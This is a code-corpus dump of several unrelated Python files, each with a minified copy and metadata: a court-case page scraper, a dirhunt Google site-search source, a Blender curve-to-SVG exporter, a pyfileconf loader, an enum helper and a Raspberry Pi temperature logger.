        "valorDaCausa": valor_da_causa,
        "classe": classe,
        "juiz": juiz,
        "partesDoProcesso": partes,
        "ultimaMovimentacao": ultima_movimentacao,
    }
def analyze_case(soup):
    """Scrape the main fields of a court-case page from a parsed HTML tree.

    Returns a dict with the case number, class, value, judge, parties and
    the latest docket movement.  Assumes every field is present in the
    page; a missing label would raise AttributeError -- TODO confirm with
    callers that pages are always complete.
    """
    # Each value lives in the <span> that follows its caption <label>.
    label_processo = soup.find("label", text="Processo:")
    label_classe = soup.find("label", text="Classe:")
    label_valor_da_causa = soup.find("label", text="Valor da ação:")
    label_juiz = soup.find("label", text="Juiz:")
    partes_do_processo = soup.find(id="tablePartesPrincipais")
    ultima_movimentacao = soup.find(id="tabelaUltimasMovimentacoes")
    numero_do_processo = label_processo.find_next('span').get_text().strip()
    classe = label_classe.find_next('span').get_text().strip()
    valor_da_causa = label_valor_da_causa.find_next('span').get_text().strip()
    juiz = label_juiz.find_next('span').get_text().strip()
    partes_do_processo = partes_do_processo.find_all('tr')
    ultima_movimentacao = ultima_movimentacao.find_next('span').get_text().strip()
    partes = []
    for parte in partes_do_processo:
        # Collapse runs of whitespace inside each party table row.
        parte = ' '.join(parte.get_text().split())
        partes.append(parte)
    response = {
        "numeroDoProcesso": numero_do_processo,
        "valorDaCausa": valor_da_causa,
        "classe": classe,
        "juiz": juiz,
        "partesDoProcesso": partes,
        "ultimaMovimentacao": ultima_movimentacao,
    }
    return response
none
1
2.944269
3
dirhunt/sources/google.py
cqr-cryeye-forks/dirhunt
0
6629046
"""Google search source for dirhunt."""
from dirhunt.sources.base import Source
from dirhunt._compat import URLError
from googlesearch import search


class Google(Source):
    """Dirhunt source that discovers site URLs via a Google ``site:`` query."""

    def callback(self, domain):
        """Feed up to 20 Google results for ``site:<domain>`` into the crawler.

        Network failures are reported through ``add_error`` and stop the
        iteration; exhaustion of the result generator ends it normally.
        """
        result_iter = search('site:{}'.format(domain), stop=20)
        while True:
            try:
                hit = next(result_iter)
            except StopIteration:
                # Result generator exhausted -- normal termination.
                break
            except (IOError, URLError) as exc:
                # Network / HTTP failure: report it and stop this source.
                self.add_error('Error on Google Source: {}'.format(exc))
                break
            self.add_result(hit)
<filename>dirhunt/sources/google.py from dirhunt.sources.base import Source from dirhunt._compat import URLError from googlesearch import search class Google(Source): def callback(self, domain): results = search('site:{}'.format(domain), stop=20) while True: try: url = next(results) except (IOError, URLError) as e: self.add_error('Error on Google Source: {}'.format(e)) break except StopIteration: break else: self.add_result(url)
none
1
2.785759
3
curve_to_svg.py
crantisz/blender-curve-to-svg
0
6629047
# Blender add-on: exports selected 2D Curve objects to an SVG file.
bl_info = {
    'name': "Export 2D Curve to SVG",
    'author': "<NAME>",
    'version': (0, 0, 2),
    'blender': (2, 80, 0),
    'location': "Properties > Data > Export SVG",
    'description': "Generate a SVG file from selected 2D Curves",
    'warning': "Curve splines may be inverted, so self intersections can be wrong after export",
    'wiki_url': "https://github.com/aryelgois/blender-curve-to-svg",
    'tracker_url': "https://github.com/aryelgois/blender-curve-to-svg/issues",
    'category': "Import-Export"}

import bpy

from xml.etree import ElementTree
from xml.dom import minidom

from mathutils import Vector
from math import pi

# Add-on version string derived from bl_info, embedded in the SVG output.
VERSION = '.'.join(str(v) for v in (bl_info['version']))


def svg_transform(obj, precision):
    """Returns SVG transform for object"""
    loc = obj.location.to_2d().to_tuple(precision)
    scl = obj.scale.to_2d().to_tuple(precision)
    # Blender stores rotation in radians; SVG rotate() wants degrees.
    rot = round(obj.rotation_euler.z * 180 / pi, precision)
    result = []
    if rot:
        result.append("rotate({} {} {})".format(rot, *loc))
    if loc[0] or loc[1]:
        result.append("translate({} {})".format(*loc))
    if scl[0] != 1.0 or scl[1] != 1.0:
        result.append("scale({} {})".format(*scl))
    return ' '.join(result)


def to_hex(ch):
    """Converts linear channel to sRGB and then to hexadecimal"""
    # Author: @brecht
    # Link: https://devtalk.blender.org/t/get-hex-gamma-corrected-color/2422/2
    if ch < 0.0031308:
        srgb = 0.0 if ch < 0.0 else ch * 12.92
    else:
        srgb = ch ** (1.0 / 2.4) * 1.055 - 0.055
    return format(max(min(int(srgb * 255 + 0.5), 255), 0), '02x')


def col_to_hex(col):
    """Converts a Color object to hexadecimal"""
    return '#' + ''.join(to_hex(ch) for ch in col)


def pretty_xml(elem):
    """Returns a pretty-printed XML string for the Element"""
    rough_string = ElementTree.tostring(elem, 'unicode')
    reparsed = minidom.parseString(rough_string)
    return reparsed.toprettyxml(indent='  ')


class CurveExportSVGPanel(bpy.types.Panel):
    """Creates a Panel in the data context of the properties editor"""
    bl_label = "Export SVG"
    bl_idname = 'DATA_PT_exportsvg'
    bl_space_type = 'PROPERTIES'
    bl_region_type = 'WINDOW'
    bl_context = 'data'

    def draw(self, context):
        """Draws the Export SVG Panel"""
        scene = context.scene
        layout = self.layout
        # Classify the selection: at least one exportable 2D curve, and/or
        # anything else that will be silently skipped.
        selected_2d_curve = False
        selected_other = False
        for obj in context.selected_objects:
            if obj.type == 'CURVE' and obj.data.dimensions == '2D':
                selected_2d_curve = True
            else:
                selected_other = True
        if selected_2d_curve:
            row = layout.row()
            row.prop(scene, 'export_svg_output', text="")
            row = layout.row()
            row.prop(scene, 'export_svg_minify')
            row = layout.row()
            row.prop(scene, 'export_svg_scale')
            row = layout.row()
            row.prop(scene, 'export_svg_precision')
            row = layout.row()
            row.operator('curve.export_svg', text="Export")
            if selected_other:
                layout.label(icon='ERROR', text="Notice: only selected 2D Curves will be exported")
        else:
            layout.label(icon='ERROR', text="You must select a 2D Curve")
            layout.label(text="Go to Shape panel and select 2D")

    @classmethod
    def poll(cls, context):
        """Checks if the Export SVG Panel should appear"""
        return context.object.type == 'CURVE'


class DATA_OT_CurveExportSVG(bpy.types.Operator):
    """Generates a SVG file from selected 2D Curves"""
    bl_label = "Export SVG"
    bl_idname = 'curve.export_svg'

    # guide https://css-tricks.com/svg-path-syntax-illustrated-guide/
    # will be used: M L C S Z
    commands = {
        'moveto': "M {x},{y}",
        'lineto': "L {x},{y}",
        #'lineto_h': "H {x}",
        #'lineto_v': "V {y}",
        'curveto': "C {h1x},{h1y} {h2x},{h2y} {x},{y}",  # h = handle_point
        'curveto_s': "S {h2x},{h2y} {x},{y}",  # mirror handle from previous C or S
        #'curveto_q': "Q {hx},{hy} {x},{y}",  # both handles in same position
        #'curveto_qs': "T {x},{y}",  # mirror handle from previous Q or T
        #'arc': "A {rx},{ry} {rot} {arc} {sweep} {x},{y}",  # arc, sweep -> 0 or 1. it's to choose between four possibilities of arc
        'closepath': "Z"}

    #handle_type = {'AUTO', 'ALIGNED', 'VECTOR', 'FREE'}

    def execute(self, context):
        """Exports selected 2D Curves to SVG file"""
        scene = context.scene
        precision = scene.export_svg_precision
        scale = scene.export_svg_scale
        svg = ElementTree.Element('svg')
        svg.set('xmlns', "http://www.w3.org/2000/svg")
        svg.set('version', "1.1")
        svg.append(ElementTree.Comment(" Generated by blender-curve-to-svg v{} ".format(VERSION)))
        container = ElementTree.SubElement(svg, 'g')
        container.set('transform', "scale({0} -{0})".format(scale))  # the Y axis is inverted
        # Running bounding box [min_x, min_y, max_x, max_y] over all exported curves.
        box = [0, 0, 0, 0]
        for obj in context.selected_objects:
            if obj.type != 'CURVE' or obj.data.dimensions != '2D':
                continue
            container.append(self.curve_to_svg(obj, precision))
            self.update_viewbox(box, obj, precision)
        box = [round(x * scale, precision) for x in box]
        svg.set('viewBox', ' '.join(str(x) for x in (box[0], -box[3], box[2] - box[0], box[3] - box[1])))
        if scene.export_svg_minify:
            result = "<?xml version=\"1.0\" ?>" + ElementTree.tostring(svg, 'unicode')
        else:
            result = pretty_xml(svg)
        f = open(scene.export_svg_output, 'w')  # TODO: search if is there a better approach
        f.write(result)
        f.close()
        return {'FINISHED'}

    def curve_to_svg(self, obj, precision):
        """Converts a Curve object to SVG elements"""
        materials = obj.data.materials
        # Group spline path data by material index so each material becomes
        # one <path> element.
        paths = {}
        for spline in obj.data.splines:
            id = spline.material_index
            d = self.spline_to_path(spline, precision)
            if id in paths:
                paths[id].extend(d)
            else:
                paths[id] = d
        if materials:
            container = ElementTree.Element('g')
            container.set('id', obj.name)
            transform = svg_transform(obj, precision)
            if transform:
                container.set('transform', transform)
            for id, d in paths.items():
                path = ElementTree.SubElement(container, 'path')
                material = materials[id]
                if material:
                    path.set('id', material.name)
                    path.set('style', "fill: {}".format(col_to_hex(material.diffuse_color)))
                path.set('d', ' '.join(d))
            return container
        # No materials: a single <path> carries the object name and transform.
        path = ElementTree.Element('path')
        path.set('id', obj.name)
        transform = svg_transform(obj, precision)
        if transform:
            path.set('transform', transform)
        path.set('d', ' '.join(paths[0]))
        return path

    def spline_to_path(self, spline, precision):
        """Converts a Curve Spline to 'd' attribute for path element"""
        d = []
        prev = None
        # TODO: fix when points are in inverted order
        # problem: some paths do union instead of difference
        for point in spline.bezier_points:
            prev = self.add_command(d, point, prev, precision)
        if spline.use_cyclic_u:
            # Close the loop back to the first point, then emit Z.
            self.add_command(d, spline.bezier_points[0], prev, precision)
            d.append(self.commands['closepath'])
        return d

    def add_command(self, d, point, prev, precision):
        """Adds the path's next command, returns previous handler point"""
        p = point.co.to_2d().to_tuple(precision)
        values = {'x': p[0], 'y': p[1]}
        # TODO: type will be used to choose between L C S commands
        # C can do all the job, but using the others can reduce the svg
        l = (point.handle_left.to_2d().to_tuple(precision), point.handle_left_type)
        r = (point.handle_right.to_2d().to_tuple(precision), point.handle_right_type)
        # first command is moveto first point, then curveto others points
        if not d:
            command = self.commands['moveto'].format(**values)
        else:
            values.update({'h1x': prev[0][0], 'h1y': prev[0][1],
                           'h2x': l[0][0], 'h2y': l[0][1]})
            command = self.commands['curveto'].format(**values)
        d.append(command)
        return r

    def update_viewbox(self, vbox, obj, precision):
        """Updates viewBox coords to fit an object"""
        # bound_box corner indices follow Blender's convention; only the
        # corners relevant to each extreme are compared.
        bbox = [(obj.matrix_world @ Vector(corner)).to_tuple(precision) for corner in obj.bound_box]
        vbox[0] = min([vbox[0], bbox[0][0], bbox[1][0], bbox[2][0], bbox[3][0]])
        vbox[1] = min([vbox[1], bbox[0][1], bbox[1][1], bbox[4][1], bbox[5][1]])
        vbox[2] = max([vbox[2], bbox[4][0], bbox[5][0], bbox[6][0], bbox[7][0]])
        vbox[3] = max([vbox[3], bbox[2][1], bbox[3][1], bbox[6][1], bbox[7][1]])


def register():
    """Registers curve_to_svg Add-on"""
    bpy.types.Scene.export_svg_output = bpy.props.StringProperty(
        name="Output",
        description="Path to output file",
        default="output.svg",
        subtype='FILE_PATH')
    bpy.types.Scene.export_svg_minify = bpy.props.BoolProperty(
        name="Minify",
        description="SVG in one line",
        default=False)
    bpy.types.Scene.export_svg_scale = bpy.props.IntProperty(
        name="Scale",
        description="How many pixels one blender unit represents",
        default=10,
        min=1)
    bpy.types.Scene.export_svg_precision = bpy.props.IntProperty(
        name="Precision",
        description="Precision of floating point Vectors",
        default=4,
        min=0,
        max=21)
    bpy.utils.register_class(DATA_OT_CurveExportSVG)
    bpy.utils.register_class(CurveExportSVGPanel)


def unregister():
    """Unregisters curve_to_svg Add-on"""
    bpy.utils.unregister_class(CurveExportSVGPanel)
    bpy.utils.unregister_class(DATA_OT_CurveExportSVG)
    del bpy.types.Scene.export_svg_output
    del bpy.types.Scene.export_svg_minify
    del bpy.types.Scene.export_svg_scale
    del bpy.types.Scene.export_svg_precision


if __name__ == '__main__':
    register()
bl_info = { 'name': "Export 2D Curve to SVG", 'author': "<NAME>", 'version': (0, 0, 2), 'blender': (2, 80, 0), 'location': "Properties > Data > Export SVG", 'description': "Generate a SVG file from selected 2D Curves", 'warning': "Curve splines may be inverted, so self intersections can be wrong after export", 'wiki_url': "https://github.com/aryelgois/blender-curve-to-svg", 'tracker_url': "https://github.com/aryelgois/blender-curve-to-svg/issues", 'category': "Import-Export"} import bpy from xml.etree import ElementTree from xml.dom import minidom from mathutils import Vector from math import pi VERSION = '.'.join(str(v) for v in (bl_info['version'])) def svg_transform(obj, precision): """Returns SVG transform for object""" loc = obj.location.to_2d().to_tuple(precision) scl = obj.scale.to_2d().to_tuple(precision) rot = round(obj.rotation_euler.z * 180 / pi, precision) result = [] if rot: result.append("rotate({} {} {})".format(rot, *loc)) if loc[0] or loc[1]: result.append("translate({} {})".format(*loc)) if scl[0] != 1.0 or scl[1] != 1.0: result.append("scale({} {})".format(*scl)) return ' '.join(result) def to_hex(ch): """Converts linear channel to sRGB and then to hexadecimal""" # Author: @brecht # Link: https://devtalk.blender.org/t/get-hex-gamma-corrected-color/2422/2 if ch < 0.0031308: srgb = 0.0 if ch < 0.0 else ch * 12.92 else: srgb = ch ** (1.0 / 2.4) * 1.055 - 0.055 return format(max(min(int(srgb * 255 + 0.5), 255), 0), '02x') def col_to_hex(col): """Converts a Color object to hexadecimal""" return '#' + ''.join(to_hex(ch) for ch in col) def pretty_xml(elem): """Returns a pretty-printed XML string for the Element""" rough_string = ElementTree.tostring(elem, 'unicode') reparsed = minidom.parseString(rough_string) return reparsed.toprettyxml(indent=' ') class CurveExportSVGPanel(bpy.types.Panel): """Creates a Panel in the data context of the properties editor""" bl_label = "Export SVG" bl_idname = 'DATA_PT_exportsvg' bl_space_type = 'PROPERTIES' 
bl_region_type = 'WINDOW' bl_context = 'data' def draw(self, context): """Draws the Export SVG Panel""" scene = context.scene layout = self.layout selected_2d_curve = False selected_other = False for obj in context.selected_objects: if obj.type == 'CURVE' and obj.data.dimensions == '2D': selected_2d_curve = True else: selected_other = True if selected_2d_curve: row = layout.row() row.prop(scene, 'export_svg_output', text="") row = layout.row() row.prop(scene, 'export_svg_minify') row = layout.row() row.prop(scene, 'export_svg_scale') row = layout.row() row.prop(scene, 'export_svg_precision') row = layout.row() row.operator('curve.export_svg', text="Export") if selected_other: layout.label(icon='ERROR', text="Notice: only selected 2D Curves will be exported") else: layout.label(icon='ERROR', text="You must select a 2D Curve") layout.label(text="Go to Shape panel and select 2D") @classmethod def poll(cls, context): """Checks if the Export SVG Panel should appear""" return context.object.type == 'CURVE' class DATA_OT_CurveExportSVG(bpy.types.Operator): """Generates a SVG file from selected 2D Curves""" bl_label = "Export SVG" bl_idname = 'curve.export_svg' # guide https://css-tricks.com/svg-path-syntax-illustrated-guide/ # will be used: M L C S Z commands = { 'moveto': "M {x},{y}", 'lineto': "L {x},{y}", #'lineto_h': "H {x}", #'lineto_v': "V {y}", 'curveto': "C {h1x},{h1y} {h2x},{h2y} {x},{y}", # h = handle_point 'curveto_s': "S {h2x},{h2y} {x},{y}", # mirror handle from previous C or S #'curveto_q': "Q {hx},{hy} {x},{y}", # both handles in same position #'curveto_qs': "T {x},{y}", # mirror handle from previous Q or T #'arc': "A {rx},{ry} {rot} {arc} {sweep} {x},{y}", # arc, sweep -> 0 or 1. 
it's to choose between four possibilities of arc 'closepath': "Z"} #handle_type = {'AUTO', 'ALIGNED', 'VECTOR', 'FREE'} def execute(self, context): """Exports selected 2D Curves to SVG file""" scene = context.scene precision = scene.export_svg_precision scale = scene.export_svg_scale svg = ElementTree.Element('svg') svg.set('xmlns', "http://www.w3.org/2000/svg") svg.set('version', "1.1") svg.append(ElementTree.Comment(" Generated by blender-curve-to-svg v{} ".format(VERSION))) container = ElementTree.SubElement(svg, 'g') container.set('transform', "scale({0} -{0})".format(scale)) # the Y axis is inverted box = [0, 0, 0, 0] for obj in context.selected_objects: if obj.type != 'CURVE' or obj.data.dimensions != '2D': continue container.append(self.curve_to_svg(obj, precision)) self.update_viewbox(box, obj, precision) box = [round(x * scale, precision) for x in box] svg.set('viewBox', ' '.join(str(x) for x in (box[0], -box[3], box[2] - box[0], box[3] - box[1]))) if scene.export_svg_minify: result = "<?xml version=\"1.0\" ?>" + ElementTree.tostring(svg, 'unicode') else: result = pretty_xml(svg) f = open(scene.export_svg_output, 'w') # TODO: search if is there a better approach f.write(result) f.close() return {'FINISHED'} def curve_to_svg(self, obj, precision): """Converts a Curve object to SVG elements""" materials = obj.data.materials paths = {} for spline in obj.data.splines: id = spline.material_index d = self.spline_to_path(spline, precision) if id in paths: paths[id].extend(d) else: paths[id] = d if materials: container = ElementTree.Element('g') container.set('id', obj.name) transform = svg_transform(obj, precision) if transform: container.set('transform', transform) for id, d in paths.items(): path = ElementTree.SubElement(container, 'path') material = materials[id] if material: path.set('id', material.name) path.set('style', "fill: {}".format(col_to_hex(material.diffuse_color))) path.set('d', ' '.join(d)) return container path = ElementTree.Element('path') 
path.set('id', obj.name) transform = svg_transform(obj, precision) if transform: path.set('transform', transform) path.set('d', ' '.join(paths[0])) return path def spline_to_path(self, spline, precision): """Converts a Curve Spline to 'd' attribute for path element""" d = [] prev = None # TODO: fix when points are in inverted order # problem: some paths do union instead of difference for point in spline.bezier_points: prev = self.add_command(d, point, prev, precision) if spline.use_cyclic_u: self.add_command(d, spline.bezier_points[0], prev, precision) d.append(self.commands['closepath']) return d def add_command(self, d, point, prev, precision): """Adds the path's next command, returns previous handler point""" p = point.co.to_2d().to_tuple(precision) values = {'x': p[0], 'y': p[1]} # TODO: type will be used to choose between L C S commands # C can do all the job, but using the others can reduce the svg l = (point.handle_left.to_2d().to_tuple(precision), point.handle_left_type) r = (point.handle_right.to_2d().to_tuple(precision), point.handle_right_type) # first command is moveto first point, then curveto others points if not d: command = self.commands['moveto'].format(**values) else: values.update({'h1x': prev[0][0], 'h1y': prev[0][1], 'h2x': l[0][0], 'h2y': l[0][1]}) command = self.commands['curveto'].format(**values) d.append(command) return r def update_viewbox(self, vbox, obj, precision): """Updates viewBox coords to fit an object""" bbox = [(obj.matrix_world @ Vector(corner)).to_tuple(precision) for corner in obj.bound_box] vbox[0] = min([vbox[0], bbox[0][0], bbox[1][0], bbox[2][0], bbox[3][0]]) vbox[1] = min([vbox[1], bbox[0][1], bbox[1][1], bbox[4][1], bbox[5][1]]) vbox[2] = max([vbox[2], bbox[4][0], bbox[5][0], bbox[6][0], bbox[7][0]]) vbox[3] = max([vbox[3], bbox[2][1], bbox[3][1], bbox[6][1], bbox[7][1]]) def register(): """Registers curve_to_svg Add-on""" bpy.types.Scene.export_svg_output = bpy.props.StringProperty( name="Output", description="Path to 
output file", default="output.svg", subtype='FILE_PATH') bpy.types.Scene.export_svg_minify = bpy.props.BoolProperty( name="Minify", description="SVG in one line", default=False) bpy.types.Scene.export_svg_scale = bpy.props.IntProperty( name="Scale", description="How many pixels one blender unit represents", default=10, min=1) bpy.types.Scene.export_svg_precision = bpy.props.IntProperty( name="Precision", description="Precision of floating point Vectors", default=4, min=0, max=21) bpy.utils.register_class(DATA_OT_CurveExportSVG) bpy.utils.register_class(CurveExportSVGPanel) def unregister(): """Unregisters curve_to_svg Add-on""" bpy.utils.unregister_class(CurveExportSVGPanel) bpy.utils.unregister_class(DATA_OT_CurveExportSVG) del bpy.types.Scene.export_svg_output del bpy.types.Scene.export_svg_minify del bpy.types.Scene.export_svg_scale del bpy.types.Scene.export_svg_precision if __name__ == '__main__': register()
en
0.721666
Returns SVG transform for object Converts linear channel to sRGB and then to hexadecimal # Author: @brecht # Link: https://devtalk.blender.org/t/get-hex-gamma-corrected-color/2422/2 Converts a Color object to hexadecimal Returns a pretty-printed XML string for the Element Creates a Panel in the data context of the properties editor Draws the Export SVG Panel Checks if the Export SVG Panel should appear Generates a SVG file from selected 2D Curves # guide https://css-tricks.com/svg-path-syntax-illustrated-guide/ # will be used: M L C S Z #'lineto_h': "H {x}", #'lineto_v': "V {y}", # h = handle_point # mirror handle from previous C or S #'curveto_q': "Q {hx},{hy} {x},{y}", # both handles in same position #'curveto_qs': "T {x},{y}", # mirror handle from previous Q or T #'arc': "A {rx},{ry} {rot} {arc} {sweep} {x},{y}", # arc, sweep -> 0 or 1. it's to choose between four possibilities of arc #handle_type = {'AUTO', 'ALIGNED', 'VECTOR', 'FREE'} Exports selected 2D Curves to SVG file # the Y axis is inverted # TODO: search if is there a better approach Converts a Curve object to SVG elements Converts a Curve Spline to 'd' attribute for path element # TODO: fix when points are in inverted order # problem: some paths do union instead of difference Adds the path's next command, returns previous handler point # TODO: type will be used to choose between L C S commands # C can do all the job, but using the others can reduce the svg # first command is moveto first point, then curveto others points Updates viewBox coords to fit an object Registers curve_to_svg Add-on Unregisters curve_to_svg Add-on
2.630674
3
pyfileconf/io/file/load/lazy/pipeline.py
nickderobertis/py-file-conf
2
6629048
from pyfileconf.io.file.load.lazy.pipelineast import PipelineAstLoader from pyfileconf.io.file.load.parsers.collections import extract_collection_from_ast class PipelineDictLoader(PipelineAstLoader): def load(self): # Get pipeline_dict_ast super().load() # Convert ast dicts and ast lists to normal dicts and lists, store as self.pipeline_dict self._pipeline_dict_assign_to_dict() return self.pipeline_dict @property def pipeline_dict(self): return self._try_getattr_else_load('_pipeline_dict') def _pipeline_dict_assign_to_dict(self): """ Iterates through ast tree of pipeline dict, producing a dict/list structure, while leaving other objects as ast representations Returns: """ if self.pipeline_dict_assign is not None: self._pipeline_dict = extract_collection_from_ast(self.pipeline_dict_assign.to_ast()) else: self._pipeline_dict = {}
from pyfileconf.io.file.load.lazy.pipelineast import PipelineAstLoader from pyfileconf.io.file.load.parsers.collections import extract_collection_from_ast class PipelineDictLoader(PipelineAstLoader): def load(self): # Get pipeline_dict_ast super().load() # Convert ast dicts and ast lists to normal dicts and lists, store as self.pipeline_dict self._pipeline_dict_assign_to_dict() return self.pipeline_dict @property def pipeline_dict(self): return self._try_getattr_else_load('_pipeline_dict') def _pipeline_dict_assign_to_dict(self): """ Iterates through ast tree of pipeline dict, producing a dict/list structure, while leaving other objects as ast representations Returns: """ if self.pipeline_dict_assign is not None: self._pipeline_dict = extract_collection_from_ast(self.pipeline_dict_assign.to_ast()) else: self._pipeline_dict = {}
en
0.909322
# Get pipeline_dict_ast # Convert ast dicts and ast lists to normal dicts and lists, store as self.pipeline_dict Iterates through ast tree of pipeline dict, producing a dict/list structure, while leaving other objects as ast representations Returns:
2.786314
3
Utilities/MessageUtilities/SwarmAnalyticsUtility/MessageInterface/Enums/ChatNumber.py
IshmaGurca/SwarmAnalytics
0
6629049
from enum import Enum import numpy as np class ChatNumberEnum(Enum): CHATNR0 = 0 CHATNR1 = 1 #CHATNR2 = 2 #CHATNR3 = 3 #CHATNR4 = 4 #CHATNR5 = 5 class ChatNumber: def __init__(self): self.Enum = ChatNumberEnum self.n = len(self.Enum) def IndexToOneHot(self, indices): import tensorflow as tf return tf.one_hot(indices,self.n) def OneHotToIndex(self,onehots): import tensorflow as tf return tf.argmax(onehots,axis = 1) def IndexToEnum(self,indices): return [self.Enum(i) for i in indices] def EnumToIndex(self, enums): return np.asarray([e.value for e in enums]) def EnumToOneHot(self,enums): indices = self.EnumToIndex(enums) return self.IndexToOneHot(indices) def OneHotToEnum(self, onehots): indices = self.OneHotToIndex(onehots) return self.IndexToEnum(indices) def GetEnumByIndex(self,index): return self.Enum(index) if __name__ == "__main__": x = ChatNumberEnum() print(x.Enum.ANSWER) print(x.Enum(0)) print('Hello')
from enum import Enum import numpy as np class ChatNumberEnum(Enum): CHATNR0 = 0 CHATNR1 = 1 #CHATNR2 = 2 #CHATNR3 = 3 #CHATNR4 = 4 #CHATNR5 = 5 class ChatNumber: def __init__(self): self.Enum = ChatNumberEnum self.n = len(self.Enum) def IndexToOneHot(self, indices): import tensorflow as tf return tf.one_hot(indices,self.n) def OneHotToIndex(self,onehots): import tensorflow as tf return tf.argmax(onehots,axis = 1) def IndexToEnum(self,indices): return [self.Enum(i) for i in indices] def EnumToIndex(self, enums): return np.asarray([e.value for e in enums]) def EnumToOneHot(self,enums): indices = self.EnumToIndex(enums) return self.IndexToOneHot(indices) def OneHotToEnum(self, onehots): indices = self.OneHotToIndex(onehots) return self.IndexToEnum(indices) def GetEnumByIndex(self,index): return self.Enum(index) if __name__ == "__main__": x = ChatNumberEnum() print(x.Enum.ANSWER) print(x.Enum(0)) print('Hello')
en
0.891665
#CHATNR2 = 2 #CHATNR3 = 3 #CHATNR4 = 4 #CHATNR5 = 5
2.922037
3
temp_log.py
millerii/rpi-temp-logger
0
6629050
<gh_stars>0 #!/usr/bin/env python3 # DS1820 and DS18S20 have the Family Code 10 # DS18B20 has Code 28 # DS1822 the 22. # Don't know will this work with 'B' or x22 -sensors import os import sys import openpyxl import datetime # Remove first comma from path if using with real sensors dir_w1_bus = "./sys/bus/w1/devices/" def scan_sensors(): temp_sensors = [] try: temp_sensors = os.listdir(dir_w1_bus) except Exception as e: print("*** Temperature sensor not found, check sensor connection or One-Wire settings. ***") raise SystemExit(e) else: # Pick only valid sensor-folders, folder starts with correct family code temp_sensors = [i for i in temp_sensors if i.startswith("10-")] if temp_sensors == []: raise FileNotFoundError return temp_sensors # List of temp-sensors id's def read_sensors(temp_sensors): # Take list of temp-sensors id's as argument temperatures = {} for sensor in temp_sensors: try_count = 0 check_crc = "NO" temp = "" try: with open(dir_w1_bus + sensor + "/w1_slave", "r") as file: while check_crc == "NO" and try_count <= 2: temp = file.read() # Parse crc-check, last word in line (YES/NO) check_crc = temp.split("\n")[0].rsplit(" ",1)[-1] try_count += 1 except Exception as e: print(e) if check_crc == "YES": # Parse temperature, last word in line followed by 't=' temp = temp.split("\n")[1].rsplit('t=',1)[-1] temp = float(temp) / 1000 # Save sensor-id and temp to dictionary key = sensor value = round(temp, 1) temperatures[key] = value else: temp = "" return temperatures # Dictionary of sensor-id combined with temperature def show_temp(): temps = read_sensors(scan_sensors()) for addres, temp in temps.items(): print(addres + ":", str(temp) + "\N{DEGREE SIGN}C") def excel_save(): def add_temp_excel(ws_data, column_for_id, last_row, temp_for_id): ws_data["A" + last_row] = date_now ws_data["A" + last_row].number_format = 'dd.mm.yyyy h:mm' ws_data[column_for_id + last_row] = temp_for_id date_now = datetime.datetime.now() temps = read_sensors(scan_sensors()) # Create 
initial excel file, if not exist excel_file = "temp_history.xlsx" if not os.path.isfile(excel_file): wb = openpyxl.Workbook() # One time excel-file initializing ws_data = wb.active ws_data.title = "data" ws_data['A1'] = "Date-Time" try: wb.save(excel_file) except Exception as e: print(e) # Load excel-workbook and save new data try: wb = openpyxl.load_workbook(excel_file) except Exception as e: print(e) else: ws_data = wb["data"] # Read excel headers for sensor-id -name compare row_headers = [] for col in ws_data['1']: row_headers.append(col.value) last_row = str(ws_data.max_row + 1) # Find last row from data-worksheet for id in temps: if id in row_headers: column_for_id = str(chr(row_headers.index(id) + 97)) # Convert row 'number' [row_headers.index(id)] to letter [id:0 + ascii:97 = A] # Add new temp for sensor-id row add_temp_excel(ws_data, column_for_id, last_row, temps[id]) else: # Add new sensor-id and save temp for that row column_for_id = chr(ws_data.max_column + 97) # Get last row [id:0 + ascii:97 = A] ws_data[column_for_id + str(1)] = id add_temp_excel(ws_data, column_for_id, last_row, temps[id]) try: wb.save(excel_file) except Exception as e: print(e) launch_argv = [] launch_argv = sys.argv if "-show" in launch_argv: show_temp() sys.exit() excel_save()
#!/usr/bin/env python3 # DS1820 and DS18S20 have the Family Code 10 # DS18B20 has Code 28 # DS1822 the 22. # Don't know will this work with 'B' or x22 -sensors import os import sys import openpyxl import datetime # Remove first comma from path if using with real sensors dir_w1_bus = "./sys/bus/w1/devices/" def scan_sensors(): temp_sensors = [] try: temp_sensors = os.listdir(dir_w1_bus) except Exception as e: print("*** Temperature sensor not found, check sensor connection or One-Wire settings. ***") raise SystemExit(e) else: # Pick only valid sensor-folders, folder starts with correct family code temp_sensors = [i for i in temp_sensors if i.startswith("10-")] if temp_sensors == []: raise FileNotFoundError return temp_sensors # List of temp-sensors id's def read_sensors(temp_sensors): # Take list of temp-sensors id's as argument temperatures = {} for sensor in temp_sensors: try_count = 0 check_crc = "NO" temp = "" try: with open(dir_w1_bus + sensor + "/w1_slave", "r") as file: while check_crc == "NO" and try_count <= 2: temp = file.read() # Parse crc-check, last word in line (YES/NO) check_crc = temp.split("\n")[0].rsplit(" ",1)[-1] try_count += 1 except Exception as e: print(e) if check_crc == "YES": # Parse temperature, last word in line followed by 't=' temp = temp.split("\n")[1].rsplit('t=',1)[-1] temp = float(temp) / 1000 # Save sensor-id and temp to dictionary key = sensor value = round(temp, 1) temperatures[key] = value else: temp = "" return temperatures # Dictionary of sensor-id combined with temperature def show_temp(): temps = read_sensors(scan_sensors()) for addres, temp in temps.items(): print(addres + ":", str(temp) + "\N{DEGREE SIGN}C") def excel_save(): def add_temp_excel(ws_data, column_for_id, last_row, temp_for_id): ws_data["A" + last_row] = date_now ws_data["A" + last_row].number_format = 'dd.mm.yyyy h:mm' ws_data[column_for_id + last_row] = temp_for_id date_now = datetime.datetime.now() temps = read_sensors(scan_sensors()) # Create initial excel 
file, if not exist excel_file = "temp_history.xlsx" if not os.path.isfile(excel_file): wb = openpyxl.Workbook() # One time excel-file initializing ws_data = wb.active ws_data.title = "data" ws_data['A1'] = "Date-Time" try: wb.save(excel_file) except Exception as e: print(e) # Load excel-workbook and save new data try: wb = openpyxl.load_workbook(excel_file) except Exception as e: print(e) else: ws_data = wb["data"] # Read excel headers for sensor-id -name compare row_headers = [] for col in ws_data['1']: row_headers.append(col.value) last_row = str(ws_data.max_row + 1) # Find last row from data-worksheet for id in temps: if id in row_headers: column_for_id = str(chr(row_headers.index(id) + 97)) # Convert row 'number' [row_headers.index(id)] to letter [id:0 + ascii:97 = A] # Add new temp for sensor-id row add_temp_excel(ws_data, column_for_id, last_row, temps[id]) else: # Add new sensor-id and save temp for that row column_for_id = chr(ws_data.max_column + 97) # Get last row [id:0 + ascii:97 = A] ws_data[column_for_id + str(1)] = id add_temp_excel(ws_data, column_for_id, last_row, temps[id]) try: wb.save(excel_file) except Exception as e: print(e) launch_argv = [] launch_argv = sys.argv if "-show" in launch_argv: show_temp() sys.exit() excel_save()
en
